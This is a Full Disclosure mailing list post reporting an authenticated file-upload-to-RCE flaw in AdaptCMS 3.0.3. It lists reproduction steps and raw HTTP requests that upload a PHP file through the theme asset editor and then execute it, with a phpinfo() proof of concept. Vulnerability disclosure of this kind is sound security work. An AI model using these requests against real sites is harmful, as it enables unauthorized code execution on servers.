| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAF2Wu1bsds7qvHjT5FO5LUFJdHish3mKhd8n1J19xKWt_8dgug@mail.gmail.com> Date: Sun, 1 Jun 2025 16:05:53 +0100 From: Andrey Stoykov <mwebsec@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Authenticated File Upload to RCE - adaptcmsv3.0.3 # Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE #1: Steps to Reproduce: 1. Login as admin user and visit "System" > "Appearance" > "Themes" > "Default" > "Theme Files" and choose "Add New File" 2. Select "Add File" 3. In the "File Contents" add the following payload "<?php phpinfo(); ?>" 4. Choose "File Extension" to be "php" and set "Folder Location" to "Images" 5. Upon uploading the file it would be available under the "img" directory // HTTP POST request POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1 Host: 192.168.58.131 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 [...] [...] ------geckoformboundary648cea5cd97a776abc03a12296adaf90 Content-Disposition: form-data; name="data[Asset][filename]"; filename="" Content-Type: application/octet-stream ------geckoformboundary648cea5cd97a776abc03a12296adaf90 Content-Disposition: form-data; name="data[Asset][content]" <?php phpinfo(); ?> ------geckoformboundary648cea5cd97a776abc03a12296adaf90 Content-Disposition: form-data; name="data[Asset][file_extension]" php ------geckoformboundary648cea5cd97a776abc03a12296adaf90 Content-Disposition: form-data; name="data[Asset][file_name]" test ------geckoformboundary648cea5cd97a776abc03a12296adaf90 Content-Disposition: form-data; name="data[Asset][folder]" img/ ------geckoformboundary648cea5cd97a776abc03a12296adaf90 Content-Disposition: form-data; name="data[Asset][theme]" [...] // HTTP Response HTTP/1.1 302 Found Date: Fri, 30 May 2025 16:06:57 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 Location: http://192.168.58.131/adaptcms/admin/themes/edit/Default#assets Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 // HTTP Request triggering the webshell GET /adaptcms/app/webroot/img/test.php HTTP/1.1 Host: 192.168.58.131 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 [...] // HTTP Response triggering the webshell HTTP/1.1 200 OK Date: Fri, 30 May 2025 16:15:36 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 102019 [...] <h1 class="p">PHP Version 5.6.40</h1> </td></tr> </table> <table> <tr><td class="e">System </td><td class="v">Linux debian 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64 </td></tr> <tr> [...] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists